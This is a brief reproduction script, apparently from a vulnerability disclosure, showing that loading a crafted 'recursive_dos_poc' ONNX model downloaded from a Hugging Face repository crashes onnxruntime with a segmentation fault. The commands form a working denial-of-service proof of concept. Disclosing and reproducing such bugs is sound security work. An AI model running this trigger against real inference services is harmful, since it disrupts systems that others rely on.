1pip install onnx onnxruntime
2wget https://huggingface.co/Yash1106/onnxruntime-recursive-dos-poc/resolve/main/recursive_dos_poc.onnx
3python3 -c "import onnxruntime as ort; ort.InferenceSession('recursive_dos_poc.onnx')"
4# Crashes with exit code 139 (SIGSEGV)